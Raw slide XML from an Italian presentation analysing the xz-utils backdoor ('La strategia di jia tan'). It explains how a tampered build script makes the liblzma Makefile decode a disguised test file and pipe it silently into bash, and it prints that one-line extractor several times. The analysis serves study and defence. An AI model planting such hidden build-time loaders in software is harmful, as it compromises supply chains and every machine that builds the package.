            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1929412"/>
            <a:ext cx="11853204" cy="449353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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stage 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scaricata la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sulla macchina, viene azionato m4/build-to-host.m4.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questo script, modificato rispetto al modello di default, modifica il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>builddir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Makefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> perché termini eseguendo questi punti:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Legge /test/files/bad-3-corrupt_lzma2.xz ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Effettua una sostituzione di caratteri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Esegue il file Bash risultante.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Semplificando, le istruzioni aggiunte corrispondono alla seguente riga di comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/files/bad-3-corrupt_lzma2.xz | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "\t \-_" " \t_\-" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> –d | /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> 2&gt;&amp;1</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="21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394554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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1926415"/>
            <a:ext cx="11853204" cy="560153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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stage 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/files/bad-3-corrupt_lzma2.xz | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "\t \-_" " \t_\-" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> –d | /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> 2&gt;&amp;1</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scrive in output tutti gli stream del file;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Il comando pipe, "|", trasforma l'output del comando a sinistra nell'input del comando a destra.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sostituisce ogni elemento dell'input secondo una relazione d'ordine stabilita dalle due righe successive: "\t" con " ", " " con "\t", "\-" con "_", "_" con "\-";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  -d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> esegue una decompressione dell'input (che è in formato .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> esegue il codice Bash dato in input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2&gt;&amp;1" redirige stream d'errore e di output verso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, "silenziando" l'esecuzione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="24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619551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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1926415"/>
            <a:ext cx="11853204" cy="338554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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stage 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Se si clonasse la repository per poi eseguire su riga di comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2100">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/files/bad-3-corrupt_lzma2.xz | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "\t \-_" " \t_\-" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> –d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Si otterrebbe un codice sorgente che, ordinato con caratteri di "a capo", apparirebbe come segue nelle prossime slide, rispettivamente in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> versione 5.6.0 e 5.6.1 .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sono evidenziate in rosso le differenze principali.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308705403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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
